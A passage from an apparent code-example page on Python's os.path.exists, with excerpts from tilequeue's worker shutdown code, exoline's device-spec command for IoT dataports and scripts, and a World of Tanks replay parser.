        logger.info('joining data fetchers ... done')
        logger.info('enqueueing sentinels for data processors ...')
        for i in range(len(data_processors)):
            sql_data_fetch_queue.put(None)
        logger.info('enqueueing sentinels for data processors ... done')
        logger.info('joining data processors ...')
        for data_processor in data_processors:
            data_processor.join()
        logger.info('joining data processors ... done')
        logger.info('enqueueing sentinels for s3 storage ...')
        for i in range(len(threads_s3_storage)):
            processor_queue.put(None)
        logger.info('enqueueing sentinels for s3 storage ... done')
        logger.info('joining s3 storage ...')
        for thread_s3_storage in threads_s3_storage:
            thread_s3_storage.join()
        logger.info('joining s3 storage ... done')
        logger.info('enqueueing sentinel for sqs queue writer ...')
        s3_store_queue.put(None)
        logger.info('enqueueing sentinel for sqs queue writer ... done')
        logger.info('joining sqs queue writer ...')
        thread_sqs_writer.join()
        logger.info('joining sqs queue writer ... done')
        if queue_printer_thread:
            logger.info('joining queue printer ...')
            queue_printer_thread.join()
            logger.info('joining queue printer ... done')

        logger.info('joining all workers ... done')

        logger.info('joining io pool ...')
        io_pool.close()
        io_pool.join()
        logger.info('joining io pool ... done')

        logger.info('joining multiprocess data fetch queue ...')
        sql_data_fetch_queue.close()
        sql_data_fetch_queue.join_thread()
        logger.info('joining multiprocess data fetch queue ... done')

        logger.info('joining multiprocess process queue ...')
        processor_queue.close()
        processor_queue.join_thread()
        logger.info('joining multiprocess process queue ... done')

        logger.warn('tilequeue processing shutdown ... done')
        sys.exit(0)

    signal.signal(signal.SIGTERM, stop_all_workers)
    signal.signal(signal.SIGINT, stop_all_workers)
    signal.signal(signal.SIGQUIT, stop_all_workers)

    logger.warn('all tilequeue threads and processes started')

    # this is necessary for the main thread to receive signals
    # when joining on threads/processes, the signal is never received
    # http://www.luke.maurits.id.au/blog/post/threads-and-signals-in-python.html
    while True:
        time.sleep(1024)
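
Here os.path.exists serves a different purpose: a fail-fast precondition, asserting that the query configuration file is present before any worker threads or processes are started. A minimal sketch of that style (load_query_config and its argument are hypothetical, not tilequeue's API):

import os
import yaml

def load_query_config(path):
    # Fail fast with a clear message instead of a FileNotFoundError
    # surfacing later, deep inside worker setup.
    assert os.path.exists(path), 'Invalid query config path: %s' % path
    with open(path) as fp:
        return yaml.safe_load(fp)

Since assert statements are stripped when Python runs with -O, production code that must keep the check often uses an explicit if-not-exists test that raises an exception instead.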

Example 103

Project: exoline
Source File: spec.py
    def run(self, cmd, args, options):
        if args['--example']:
            s = '''
# Example client specification file
# Specification files are in YAML format (a superset of JSON
# with more readable syntax and support for comments) and
# look like this. They may contain comments that begin
# with a # sign.

# Device client model information
device:
    model: "myModel"
    vendor: "myVendor"

# list of dataports that must exist
dataports:
      # this the absolute minimum needed to specify a
      # dataport.
    - alias: mystring
      # names are created, but not compared
    - name: Temperature
      # aliases, type, and format are created
      # and compared
      alias: temp
      format: float
      unit: °F
    - name: LED Control
      alias: led6
      format: integer
    - alias: config
      # format should be string, and parseable JSON
      format: string/json
      # initial value (if no other value is read back)
      initial: '{"text": "555-555-1234", "email": "[email protected]"}'
    - alias: person
      format: string/json
      # JSON schema specified inline (http://json-schema.org/)
      # format must be string/json to do validate
      # you may also specify a string to reference schema in an
      # external file. E.g. jsonschema: personschema.json
      jsonschema: {"title": "Person Schema",
                   "type": "object",
                   "properties": {"name": {"type": "string"}},
                   "required": ["name"]}
      initial: '{"name":"John Doe"}'
    - alias: place
      # An description of the dataport.
      description: 'This is a place I have been'
      # Dataports are not public by default,
      # but if you want to share one with the world
      public: true

    # any dataports not listed but found in the client
    # are ignored. The spec command does not delete things.

# list of script datarules that must exist
scripts:
    # by default, scripts are datarules with
    # names and aliases set to the file name
    - file: test/files/helloworld.lua
    # you can also set them explicitly
    - file: test/files/helloworld.lua
      alias: greeting
    # you can also place lua code inline
    - alias: singleLineScript
      code: debug('hello from inside lua!')
    # multiline lua scripts should start with | and
    # be indented inside the "code:" key.
    - alias: multilineScript
      code: |
        for x=1,10 do
            debug('hello from for loop ' .. x)
        end
    # simple templating for script aliases and
    # content is also supported.
    - file: test/files/convert.lua
      # if <% id %> is embedded in aliases
      # or script content, the --ids parameter must
      # be passed in. The spec command then expects
      # a script or dataport resource per id passed, substituting
      # each ID for <% id %>. In this example, if the command was:
      #
      # $ exo spec mysensor sensorspec.yaml --ids=A,B
      #
      # ...then the spec command looks for *two* script datarules
      # in mysensor, with aliases convertA.lua and convertB.lua.
      # Additionally, any instances of <% id %> in the content of
      # convert.lua are substituted with A and B before being
      # written to each script datarule.
      #
      alias: convert<% id %>.lua

# list of dispatches that must exist
dispatches:
    - alias: myDispatch
      # email | http_get | http_post | http_put | sms | xmpp
      method: email
      recipient: [email protected]
      message: hello from Exoline spec example!
      subject: hello!
      # may be an RID or alias
      subscribe: mystring

# list of simple datarules that must exist.
# scripts may go here too, but it's better to
# to put them under scripts (above)
datarules:
    - alias: highTemp
      format: float
      subscribe: temp
      rule: {
        "simple": {
          "comparison": "gt",
          "constant": 80,
          "repeat": true
        }
      }
'''
            if not six.PY3:
                s = s.encode('utf-8')
            print(s)
            return

        ExoException = options['exception']
        def load_file(path, base_url=None):
            '''load a file based on a path that may be a filesystem path
            or a URL. Consider it a URL if it starts with two or more
            alphabetic characters followed by a colon'''
            def load_from_url(url):
                # URL. use requests
                r = requests.get(url)
                if r.status_code >= 300:
                    raise ExoException('Failed to read file at URL ' + url)
                return r.text, '/'.join(r.url.split('/')[:-1])

            if re.match('[a-z]{2}[a-z]*:', path):
                return load_from_url(path)
            elif base_url is not None:
                # non-url paths when spec is loaded from URLs
                # are considered relative to that URL
                return load_from_url(base_url + '/' + path)
            else:
                with open(path, 'rb') as f:
                    return f.read(), None


        def load_spec(args):
            # returns loaded spec and path for script files
            try:
                content, base_url = load_file(args['<spec-yaml>'])
                spec = yaml.safe_load(content)
                return spec, base_url
            except yaml.scanner.ScannerError as ex:
                raise ExoException('Error parsing YAML in {0}\n{1}'.format(args['<spec-yaml>'],ex))

        def check_spec(spec, args):
            msgs = []
            for typ in TYPES:
                if typ in spec and plural(typ) not in spec:
                    msgs.append('found "{0}"... did you mean "{1}"?'.format(typ, typ + 's'))
            for dp in spec.get('dataports', []):
                if 'alias' not in dp:
                    msgs.append('dataport is missing alias: {0}'.format(dp))
                    continue
                alias = dp['alias']
                if 'jsonschema' in dp:
                    schema = dp['jsonschema']
                    if isinstance(schema, six.string_types):
                        schema = json.loads(open(schema).read())
                    try:
                        jsonschema.Draft4Validator.check_schema(schema)
                    except Exception as ex:
                        msgs.append('{0} failed jsonschema validation.\n{1}'.format(alias, str(ex)))
            if len(msgs) > 0:
                raise ExoException('Found some problems in spec:\n' + '\n'.join(msgs))

        if args['--check']:
            # Validate all the jsonschema
            spec, base_url = load_spec(args)
            check_spec(spec, args)
            return

        reid = re.compile('<% *id *%>')
        def infoval(input_auth, alias):
            '''Get info and latest value for a resource'''
            return rpc._exomult(
                input_auth,
                [['info', {'alias': alias}, {'description': True, 'basic': True}],
                ['read', {'alias': alias}, {'limit': 1}]])

        def check_or_create_description(auth, info, args):
            if 'device' in spec and 'limits' in spec['device']:
                speclimits = spec['device']['limits']
                infolimits = info['description']['limits']
                limits_mismatched = False
                for limit in speclimits:
                    if limit not in infolimits:
                        raise ExoException('spec file includes invalid limit {0}'.format(limit))
                    if speclimits[limit] != infolimits[limit]:
                        limits_mismatched = True
                if limits_mismatched:
                    if create:
                        if 'client_id' not in auth:
                            raise ExoException('limits update for client requires --portal or --domain')

                        rpc.update(auth['cik'], auth['client_id'], {'limits': speclimits})
                        sys.stdout.write('updated limits for client' +
                                         ' RID {0}'.format(auth['client_id']))
                    else:
                        sys.stdout.write(
                            'limits for client {0} do not match spec:\nspec: {1}\nclient: {2}'.format(
                                auth,
                                json.dumps(speclimits, sort_keys=True),
                                json.dumps(infolimits, sort_keys=True)))


        def check_or_create_common(auth, res, info, alias, aliases):
            if info['basic']['type'] != typ:
                raise ExoException('{0} is a {1} but should be a {2}.'.format(alias, info['basic']['type'], typ))

            new_desc = info['description'].copy()
            need_update = False

            if 'public' in res:
                res_pub = res['public']
                desc = info['description']
                if desc['public'] != res_pub:
                    if create:
                        new_desc['public'] = res_pub
                        need_update = True
                    else:
                        sys.stdout.write('spec expects public for {0} to be {1}, but it is not.\n'.format(alias, res_pub))
                        print(json.dumps(res))

            if 'subscribe' in res:
                # Alias *must* be local to this client
                resSub = res['subscribe']
                # Lookup alias/name if need be
                if resSub in aliases:
                    resSub = aliases[resSub]
                desc = info['description']
                if desc['subscribe'] != resSub:
                    if create:
                        new_desc['subscribe'] = resSub
                        need_update = True
                    else:
                        sys.stdout.write('spec expects subscribe for {0} to be {1}, but they are not.\n'.format(alias, resSub))

            if 'preprocess' in res:
                def fromAliases(pair):
                    if pair[1] in aliases:
                        return [pair[0], aliases[pair[1]]]
                    else:
                        return pair
                resPrep = [fromAliases(x) for x in res['preprocess']]
                preprocess = info['description']['preprocess']
                if create:
                    new_desc['preprocess'] = resPrep
                    need_update = True
                else:
                    if preprocess is None or len(preprocess) == 0:
                        sys.stdout.write('spec expects preprocess for {0} to be {1}, but they are missing.\n'.format(alias, resPrep))
                    elif preprocess != resPrep:
                        sys.stdout.write('spec expects preprocess for {0} to be {1}, but they are {2}.\n'.format(alias, resPrep, preprocess))

            if 'retention' in res:
                resRet = {}
                if 'count' in res['retention']:
                    resRet['count'] = res['retention']['count']
                if 'duration' in res['retention']:
                    resRet['duration'] = res['retention']['duration']
                retention = info['description']['retention']
                if create:
                    new_desc['retention'] = resRet
                    need_update = True
                elif retention != resRet:
                    sys.stdout.write('spec expects retention for {0} to be {1}, but they are {2}.\n'.format(alias, resRet, retention))

            if need_update:
                rpc.update(auth, {'alias': alias}, new_desc)

        def get_format(res, default='string'):
            format = res['format'] if 'format' in res else default
            pieces = format.split('/')
            if len(pieces) > 1:
                format = pieces[0]
                format_content = pieces[1]
            else:
                format_content = None
            return format, format_content

        def add_desc(key, res, desc, required=False):
            '''add key from spec resource to a 1P resource description'''
            if key in res:
                desc[key] = res[key]
            else:
                if required:
                    raise ExoException('{0} in spec is missing required property {1}.'.format(alias, key))

        def create_resource(auth, typ, desc, alias, msg=''):
            name = res['name'] if 'name' in res else alias
            print('Creating {0} with name: {1}, alias: {2}{3}'.format(
                typ, name, alias, msg))
            rid = rpc.create(auth, typ, desc, name=name)
            rpc.map(auth, rid, alias)
            info, val = infoval(auth, alias)
            aliases[alias] = rid
            return info, val

        def check_or_create_datarule(auth, res, info, val, alias, aliases):
            format, format_content = get_format(res, 'float')
            if not exists and create:
                desc = {'format': format}
                desc['retention'] = {'count': 'infinity', 'duration': 'infinity'}
                add_desc('rule', res, desc, required=True)
                info, val = create_resource(
                    auth,
                    'datarule',
                    desc,
                    alias,
                    msg=', format: {0}, rule: {1}'.format(desc['format'], desc['rule']))

            # check format
            if format != info['description']['format']:
                raise ExoException(
                    '{0} is a {1} but should be a {2}.'.format(
                    alias, info['description']['format'], format))

            # check rule
            infoRule = json.dumps(info['description']['rule'], sort_keys=True)
            specRule = json.dumps(res['rule'], sort_keys=True)
            if infoRule != specRule:
                if create:
                    info['description']['rule'] = res['rule']
                    rpc.update(auth, {'alias': alias}, info['description'])
                    sys.stdout.write('updated rule for {0}\n'.format(alias))
                else:
                    sys.stdout.write(
                        'spec expects rule for {0} to be:\n{1}\n...but it is:\n{2}\n'.format(
                        alias, specRule, infoRule))

            check_or_create_common(auth, res, info, alias, aliases)

        def check_or_create_dataport(auth, res, info, val, alias, aliases):
            format, format_content = get_format(res, 'string')
            if not exists and create:
                desc = {'format': format}
                desc['retention'] = {'count': 'infinity', 'duration': 'infinity'}
                info, val = create_resource(
                    auth,
                    'dataport',
                    desc,
                    alias,
                    msg=', format: {0}'.format(format))

            # check format
            if format != info['description']['format']:
                raise ExoException(
                    '{0} is a {1} but should be a {2}.'.format(
                    alias, info['description']['format'], format))

            # check initial value
            if 'initial' in res and len(val) == 0:
                if create:
                    initialValue = template(res['initial'])
                    print('Writing initial value {0}'.format(initialValue))
                    rpc.write(auth, {'alias': alias}, initialValue)
                    # update values being validated
                    info, val = infoval(auth, alias)
                else:
                    print('Required initial value not found in {0}. Pass --create to write initial value.'.format(alias))

            # check format content (e.g. json)
            if format_content == 'json':
                if format != 'string':
                    raise ExoException(
                        'Invalid spec for {0}. json content type only applies to string, not {1}.'.format(alias, format));
                if len(val) == 0:
                    print('Spec requires {0} be in JSON format, but it is empty.'.format(alias))
                else:
                    obj = None
                    try:
                        obj = json.loads(val[0][1])
                    except:
                        print('Spec requires {0} be in JSON format, but it does not parse as JSON. Value: {1}'.format(
                            alias,
                            val[0][1]))

                    if obj is not None and 'jsonschema' in res:
                        schema = res['jsonschema']
                        if isinstance(schema, six.string_types):
                            schema = json.loads(open(schema).read())
                        try:
                            jsonschema.validate(obj, schema)
                        except Exception as ex:
                            print("{0} failed jsonschema validation.".format(alias))
                            print(ex)

            elif format_content is not None:
                raise ExoException(
                    'Invalid spec for {0}. Unrecognized format content {1}'.format(alias, format_content))

            # check unit
            if 'unit' in res or 'description' in res:
                meta_string = info['description']['meta']
                try:
                    meta = json.loads(meta_string)
                except:
                    meta = None

                def bad_desc_msg(s):
                    desc='""'
                    if 'description' in res:
                        desc = res['description']
                    sys.stdout.write('spec expects description for {0} to be {1}{2}\n'.format(alias, desc, s))
                def bad_unit_msg(s):
                    unit=''
                    if 'unit' in res:
                        unit = res['unit']
                    sys.stdout.write('spec expects unit for {0} to be {1}{2}\n'.format(alias, unit, s))

                if create:
                    if meta is None:
                        meta = {'datasource':{'description':'','unit':''}}
                    if 'datasource' not in meta:
                        meta['datasource'] = {'description':'','unit':''}
                    if 'unit' in res:
                        meta['datasource']['unit'] = res['unit']
                    if 'description' in res:
                        meta['datasource']['description'] = res['description']

                    info['description']['meta'] = json.dumps(meta)
                    rpc.update(auth, {'alias': alias}, info['description'])

                else:
                    if meta is None:
                        sys.stdout.write('spec expects metadata but found no metadata at all. Pass --create to write metadata.\n')
                    elif 'datasource' not in meta:
                        sys.stdout.write('spec expects datasource in metadata but it is not there. Pass --create to write metadata.\n')
                    elif 'unit' not in meta['datasource'] and 'unit' in res:
                        bad_unit_msg(', but no unit is specified in metadata. Pass --create to set unit.\n')
                    elif 'description' not in meta['datasource'] and 'description' in res:
                        bad_desc_msg(', but no description is specified in metadata. Pass --create to set description.\n')
                    elif 'unit' in res and meta['datasource']['unit'] != res['unit']:
                        bad_unit_msg(', but metadata specifies unit of {0}. Pass --create to update unit.\n'.format(meta['datasource']['unit']))
                    elif 'description' in res and meta['datasource']['description'] != res['description']:
                        bad_desc_msg(', but metadata specifies description of {0}. Pass --create to update description.\n'.format(meta['datasource']['description']))

            check_or_create_common(auth, res, info, alias, aliases)

        def check_or_create_dispatch(auth, res, info, alias, aliases):
            if not exists and create:
                desc = {}
                add_desc('method', res, desc, required=True)
                add_desc('recipient', res, desc, required=True)
                add_desc('subject', res, desc)
                add_desc('message', res, desc)
                desc['retention'] = {'count': 'infinity', 'duration': 'infinity'}
                info, val = create_resource(
                    auth,
                    'dispatch',
                    desc,
                    alias,
                    msg=', method: {0}, recipient: {1}'.format(desc['method'], desc['recipient']))

            # check dispatch-specific things
            def check_desc(key, res, desc):
                '''check a specific key and return whether an update is required'''
                if key in res and desc[key] != res[key]:
                    if create:
                        desc[key] = res[key]
                        return True
                    else:
                        sys.stdout.write(
                            'spec expects {0} for {1} to be {2} but it is {3}\n'.format(
                            key, alias, res[key], desc[key]))
                return False

            desc = info['description']
            need_update = False
            need_update = check_desc('method', res, desc) or need_update
            need_update = check_desc('recipient', res, desc) or need_update
            need_update = check_desc('subject', res, desc) or need_update
            need_update = check_desc('message', res, desc) or need_update
            if need_update:
                rpc.update(auth, {'alias': alias}, desc)
                sys.stdout.write('updated {0} to {1}\n'.format(alias, json.dumps(desc, sort_keys=True)))

            check_or_create_common(auth, res, info, alias, aliases)


        input_auth = options['auth']
        exoutils = options['utils']
        rpc = options['rpc']
        asrid = args['--asrid']

        if cmd == 'spec':

            if args['--generate'] is not None:
                spec_file = args['--generate']
                if args['--scripts'] is not None:
                    script_dir = args['--scripts']
                else:
                    script_dir = 'scripts'
                print('Generating spec for {0}.'.format(input_auth))
                print('spec file: {0}, scripts directory: {1}'.format(spec_file, script_dir))

                # generate spec file, download scripts
                spec = {}
                info, listing = rpc._exomult(input_auth,
                    [['info', {'alias': ''}, {'basic': True,
                                              'description': True,
                                              'aliases': True}],
                     ['listing', ['dataport', 'datarule', 'dispatch'], {}, {'alias': ''}]])
                rids = listing['dataport'] + listing['datarule'] + listing['dispatch']

                if len(rids) > 0:
                    child_info = rpc._exomult(input_auth, [['info', rid, {'basic': True, 'description': True}] for rid in rids])
                    for idx, rid in enumerate(rids):
                        myinfo = child_info[idx]
                        name = myinfo['description']['name']
                        def skip_msg(msg):
                            print('Skipping {0} (name: {1}). {2}'.format(rid, name, msg))
                        if rid not in info['aliases']:
                            skip_msg('It needs an alias.')
                            continue

                        # adds properties common to dataports and dispatches:
                        # preprocess, subscribe, retention, meta, public
                        def add_common_things(res):
                            res['name'] = myinfo['description']['name']
                            res['alias'] = info['aliases'][rid][0]
                            preprocess = myinfo['description']['preprocess']
                            if preprocess is not None and len(preprocess) > 0:
                                def toAlias(pair):
                                    if not asrid and pair[1] in info['aliases']:
                                        return [pair[0], info['aliases'][pair[1]][0]]
                                    else:
                                        return pair
                                res['preprocess'] = [toAlias(x) for x in preprocess]


                            subscribe = myinfo['description']['subscribe']
                            if subscribe is not None and subscribe != "":
                                if not asrid and subscribe in info['aliases']:
                                    res['subscribe'] = info['aliases'][subscribe][0]
                                else:
                                    res['subscribe'] = subscribe

                            retention = myinfo['description']['retention']
                            if retention is not None:
                                count = retention['count']
                                duration = retention['duration']
                                if count is not None and duration is not None:
                                    if count == 'infinity':
                                        del retention['count']
                                    if duration == 'infinity':
                                        del retention['duration']
                                    if len(retention) > 0:
                                        res['retention'] = retention

                            meta_string = myinfo['description']['meta']
                            try:
                                meta = json.loads(meta_string)
                                unit = meta['datasource']['unit']
                                if len(unit) > 0:
                                    res['unit'] = unit
                                desc = meta['datasource']['description']
                                if len(desc) > 0:
                                    res['description'] = desc
                            except:
                                # assume unit is not present in metadata
                                pass

                            public = myinfo['description']['public']
                            if public is not None and public:
                                res['public'] = public


                        typ = myinfo['basic']['type']
                        if typ == 'dataport':
                            res = {
                                'format': myinfo['description']['format']
                            }
                            add_common_things(res)
                            spec.setdefault('dataports', []).append(res)

                        elif typ == 'datarule':
                            desc = myinfo['description']
                            is_script = desc['format'] == 'string' and 'rule' in desc and 'script' in desc['rule']
                            if is_script:
                                if not os.path.exists(script_dir):
                                    os.makedirs(script_dir)
                                filename = os.path.join(script_dir, info['aliases'][rid][0])
                                spec.setdefault('scripts', []).append({'file': filename})
                                with open(filename, 'w') as f:
                                    print('Writing {0}...'.format(filename))
                                    f.write(desc['rule']['script'].encode('utf8'))
                            else:
                                res = {
                                    'rule': desc['rule']
                                }
                                add_common_things(res)
                                spec.setdefault('datarules', []).append(res)

                        elif typ == 'dispatch':
                            desc = myinfo['description']
                            res = {
                                'method': desc['method'],
                                'message': desc['message'],
                                'recipient': desc['recipient'],
                                'subject': desc['subject']
                            }
                            add_common_things(res)
                            spec.setdefault('dispatches', []).append(res)

                with open(spec_file, 'w') as f:
                    print('Writing {0}...'.format(spec_file))
                    yaml.safe_dump(spec, f, encoding='utf-8', indent=4, default_flow_style=False, allow_unicode=True)
                return

            updatescripts = args['--update-scripts']
            create = args['--create']

            def query_yes_no(question, default="yes"):
                """Ask a yes/no question via raw_input() and return their answer.

                "question" is a string that is presented to the user.
                "default" is the presumed answer if the user just hits <Enter>.
                    It must be "yes" (the default), "no" or None (meaning
                    an answer is required of the user).

                The "answer" return value is one of "yes" or "no".
                """
                valid = {"yes":True,   "y":True,  "ye":True,
                         "no":False,     "n":False}
                if default == None:
                    prompt = " [y/n] "
                elif default == "yes":
                    prompt = " [Y/n] "
                elif default == "no":
                    prompt = " [y/N] "
                else:
                    raise ValueError("invalid default answer: '%s'" % default)

                while True:
                    sys.stdout.write(question + prompt)
                    choice = raw_input().lower()
                    if default is not None and choice == '':
                        return valid[default]
                    elif choice in valid:
                        return valid[choice]
                    else:
                        sys.stdout.write("Please respond with 'yes' or 'no' "\
                                         "(or 'y' or 'n').\n")

            def generate_aliases_and_data(res, args):
                ids = args['--ids']
                if 'alias' in res:
                    alias = res['alias']
                else:
                    if 'file' in res:
                        alias = os.path.basename(res['file'])
                    else:
                        raise ExoException('Resources in spec must have an alias. (For scripts, "file" will substitute.)')

                if reid.search(alias) is None:
                    yield alias, None
                else:
                    alias_template = alias
                    if ids is None:
                        raise ExoException('This spec requires --ids')
                    ids = ids.split(',')
                    for id, alias in [(id, reid.sub(id, alias_template)) for id in ids]:
                        yield alias, {'id': id}

            spec, base_url = load_spec(args)
            check_spec(spec, args)

            device_auths = []
            portal_ciks = []

            iterate_portals = False

            def auth_string(auth):
                if isinstance(auth, dict):
                    return json.dumps(auth)
                else:
                    return auth

            if args['--portal'] == True:
                cik = exoutils.get_cik(input_auth, allow_only_cik=True)
                portal_ciks.append((cik,''))
                iterate_portals = True

            if args['--domain'] == True:
                cik = exoutils.get_cik(input_auth, allow_only_cik=True)
                #set iterate_portals flag to true so we can iterate over each portal
                iterate_portals = True
                # Get list of users under a domain
                user_keys = []
                clients = rpc._listing_with_info(cik,['client'])

                email_regex = re.compile(r'[^@]+@[^@]+\.[^@]+')

                for k,v in clients['client'].items():
                    name = v['description']['name']
                    # if name is an email address
                    if email_regex.match(name):
                        user_keys.append(v['key'])


                # Get list of each portal
                for key in user_keys:
                    userlisting = rpc._listing_with_info(key,['client'])
                    for k,v in userlisting['client'].items():
                        portal_ciks.append((v['key'],v['description']['name']))
                    #print(x)


            if iterate_portals == True:
                for portal_cik, portal_name in portal_ciks:
                    # If user passed in the portal flag, but the spec doesn't have
                    # a vendor/model, exit
                    if (not 'device' in spec) or (not 'model' in spec['device']) or (not 'vendor' in spec['device']):
                        print("With --portal (or --domain) option, spec file requires a\r\n"
                              "device model and vendor field:\r\n"
                              "e.g.\r\n"
                              "device:\r\n"
                              "    model: modelName\r\n"
                              "    vendor: vendorName\r\n")
                        raise ExoException('--portal flag requires a device model/vendor in spec file')
                    else:

                        # get device vendor and model
                        modelName = spec['device']['model']
                        vendorName = spec['device']['vendor']

                        # If the portal has no name, use the cik as the name
                        if portal_name == '':
                            portal_name = portal_cik
                        print('Looking in ' + portal_name + ' for ' + modelName + '/' + vendorName)
                        # Get all clients in the portal
                        clients = rpc._listing_with_info(portal_cik, ['client'])
                        #print(modelName)
                        # for each client
                        for rid, v in iteritems(list(iteritems(clients))[0][1]):
                            # Get meta field
                            validJson = False
                            meta = None
                            try:
                                meta = json.loads(v['description']['meta'])
                                validJson = True
                            except ValueError as e:
                                # no JSON in this meta field
                                validJson = False
                            if validJson == True:
                                # get device type (only vendor types have a model and vendor)
                                typ = meta['device']['type']

                                # if the device type is 'vendor'
                                if typ == 'vendor':
                                    # and it matches our vendor/model in the spec file
                                    if meta['device']['vendor'] == vendorName:
                                        if meta['device']['model'] == modelName:
                                            # Append an auth for this device to our list
                                            auth = {
                                                'cik': portal_cik, # v['key'],
                                                'client_id': rid
                                            }
                                            device_auths.append(auth)
                                            print('  found: {0} {1}'.format(v['description']['name'], auth_string(auth)))
            else:
                # only for single client
                device_auths.append(input_auth)

            # Make sure user knows they are about to update multiple devices
            # unless the `-f` flag is passed
            if ((args['--portal'] or args['--domain']) and args['--create']) and not args['-f']:
                res = query_yes_no("You are about to update " + str(len(device_auths)) + " devices, are you sure?")
                if res == False:
                    print('exiting')
                    return

            # for each device in our list of device_auths
            for auth in device_auths:
                try:
                    aliases = {}
                    print("Running spec on: {0}".format(auth_string(auth)))
                    #   apply spec [--create]

                    # Get map of aliases and description
                    info = rpc.info(auth, {'alias': ''}, {'aliases': True, 'description': True})
                    try:
                        for rid, alist in info['aliases'].items():
                            for alias in alist:
                                aliases[alias] = rid
                    except:
                        pass

                    # Check limits
                    check_or_create_description(auth, info, args)

                    for typ in TYPES:
                        for res in spec.get(plural(typ), []):
                            for alias, resource_data in generate_aliases_and_data(res, args):
                                # TODO: handle nonexistence
                                exists = True
                                try:
                                    info, val = infoval(auth, alias)
                                except rpc.RPCException as e:
                                    info = None
                                    val = None
                                    exists = False
                                    print('{0} not found.'.format(alias))
                                    if not create:
                                        print('Pass --create to create it')
                                        continue
                                except pyonep.exceptions.OnePlatformException as ex:
                                    exc = ast.literal_eval(ex.message)

                                    if exc['code'] == 401:
                                        raise Spec401Exception()
                                    else:
                                        raise ex

                                def template(script):
                                    if resource_data is None:
                                        return script
                                    else:
                                        return reid.sub(resource_data['id'], script)

                                if typ == 'client':
                                    if not exists:
                                        if create:
                                            print('Client creation is not yet supported')
                                        continue
                                elif typ == 'dataport':
                                    check_or_create_dataport(auth, res, info, val, alias, aliases)
                                elif typ == 'dispatch':
                                    check_or_create_dispatch(auth, res, info, alias, aliases)
                                elif typ == 'datarule':
                                    check_or_create_datarule(auth, res, info, val, alias, aliases)
                                elif typ == 'script':
                                    if 'file' not in res and 'code' not in res:
                                        raise ExoException('{0} is a script, so it needs a "file" or "code" key'.format(alias))
                                    if 'file' in res and 'code' in res:
                                        raise ExoException('{0} specifies both "file" and "code" keys, but they\'re mutually exclusive.'.format(alias))

                                    name = res['name'] if 'name' in res else alias

                                    if 'file' in res:
                                        content, _ = load_file(res['file'], base_url=base_url)
                                        if not six.PY3 or type(content) is bytes:
                                            content = content.decode('utf8')
                                    else:
                                        content = res['code']
                                    if not exists and create:
                                        rpc.upload_script_content([auth], content, name=alias, create=True, filterfn=template)
                                        continue

                                    script_spec = template(content)
                                    script_svr = info['description']['rule']['script']
                                    script_friendly = 'file {0}'.format(res['file']) if 'file' in res else '"code" value in spec'
                                    if script_svr != script_spec:
                                        print('Script for {0} does not match {1}.'.format(alias, script_friendly))
                                        if updatescripts:
                                            print('Uploading script to {0}...'.format(alias))
                                            rpc.upload_script_content([auth], script_spec, name=name, create=False, filterfn=template)
                                        elif not args['--no-diff']:
                                            # show diff
                                            import difflib
                                            differences = '\n'.join(
                                                difflib.unified_diff(
                                                    script_spec.splitlines(),
                                                    script_svr.splitlines(),
                                                    fromfile=script_friendly,
                                                    tofile='info["description"]["rule"]["script"]'))

                                            print(differences)
                                else:
                                    raise ExoException('Found unsupported type {0} in spec.'.format(typ))
                except Spec401Exception as ex:
                    print("******WARNING******* 401 received in spec, is the device expired?")
                    pass
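
The spec-generation branch of the exoline example above uses os.path.exists to create the scripts directory only when it is missing, before downloaded rule scripts are written into it. A minimal sketch of that guard follows (ensure_script_dir is a hypothetical helper name, not part of exoline):

import os

def ensure_script_dir(path):
    # Create the directory only when it is missing, as the spec generator
    # does before writing downloaded scripts into it. The check-then-create
    # pair is not atomic; on Python 3, os.makedirs(path, exist_ok=True)
    # sidesteps the race.
    if not os.path.exists(path):
        os.makedirs(path)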

Example 104

Project: WoT-Replay-To-JSON
Source File: wotrp2j.py
View license
def main():

	parserversion = "0.9.8.0"

	global option_console, option_advanced, option_chat, option_server, filename_source
	option_console = 0
	option_advanced = 0
	option_chat = 0
	option_server = 0
	
	filename_source = ""
	
	replay_version = "0.0.0.0"
	replay_version_dict = ['0', '0', '0', '0']
	

	for argument in sys.argv:
			if argument == "-c":
				option_console = 1
				
			if argument == "-a":
				option_advanced = 1

			if argument == "-chat":
				option_chat = 1
				
			if argument == "-s":
				option_server = 1
			

	printmessage('###### WoT-Replay-To-JSON ' + parserversion + " by vBAddict.net")

	if len(sys.argv)==1:
				printmessage('Please specify filename and options')
				sys.exit(2)

	filename_source = str(sys.argv[1])
	
	printmessage('Processing ' + filename_source)
	
	result_blocks = dict()
	result_blocks['common'] = dict()
	result_blocks['common']['parser'] = "WoT-Replay-To-JSON " + parserversion + " by http://www.vbaddict.net"

	result_blocks['identify'] = dict()
	result_blocks['identify']['arenaUniqueID'] = 0
	
	if not os.path.exists(filename_source) or not os.path.isfile(filename_source) or not os.access(filename_source, os.R_OK):
		result_blocks['common']['message'] = 'cannot read file ' + filename_source
		dumpjson(result_blocks, filename_source, 1)

	f = open(filename_source, 'rb')
	
	try:
		f.seek(4)
		numofblocks = struct.unpack("I",f.read(4))[0]
		printmessage("Found Blocks: " + str(numofblocks))
		blockNum = 1
		datablockPointer = {}
		datablockSize = {}
		startPointer = 8
	except Exception, e:
		result_blocks['common']['message'] = e.message
		dumpjson(result_blocks, filename_source, 1)

	if numofblocks == 0:
		result_blocks['common']['message'] = "unknown file structure"
		dumpjson(result_blocks, filename_source, 1)

	if numofblocks > 5:

		result_blocks['common']['message'] = "uncompressed replay"
		result_blocks['datablock_advanced'] = extract_advanced(filename_source)
			
		if result_blocks['datablock_advanced']['valid'] == 1:
			
			result_blocks['identify']['accountDBID'] = 0
			result_blocks['identify']['internaluserID'] = 0
			if result_blocks['datablock_advanced']['playername'] in result_blocks['datablock_advanced']['roster']:
				rosterdata = dict()			
				rosterdata = result_blocks['datablock_advanced']['roster'][result_blocks['datablock_advanced']['playername']]
				result_blocks['identify']['accountDBID'] = rosterdata['accountDBID'] 
				result_blocks['identify']['countryid'] = rosterdata['countryID']
				result_blocks['identify']['internaluserID'] = rosterdata['internaluserID']
				result_blocks['identify']['tankid'] = rosterdata['tankID']
		
			
			result_blocks['identify']['arenaUniqueID'] = result_blocks['datablock_advanced']['arenaUniqueID']
			result_blocks['identify']['arenaCreateTime'] = result_blocks['datablock_advanced']['arenaCreateTime']
			
			mapsdata = get_json_data("maps.json")
			mapname='unknown'
			for mapdata in mapsdata:
				if mapdata['mapid'] == result_blocks['datablock_advanced']['arenaTypeID']:
						mapname = mapdata['mapidname']
						break

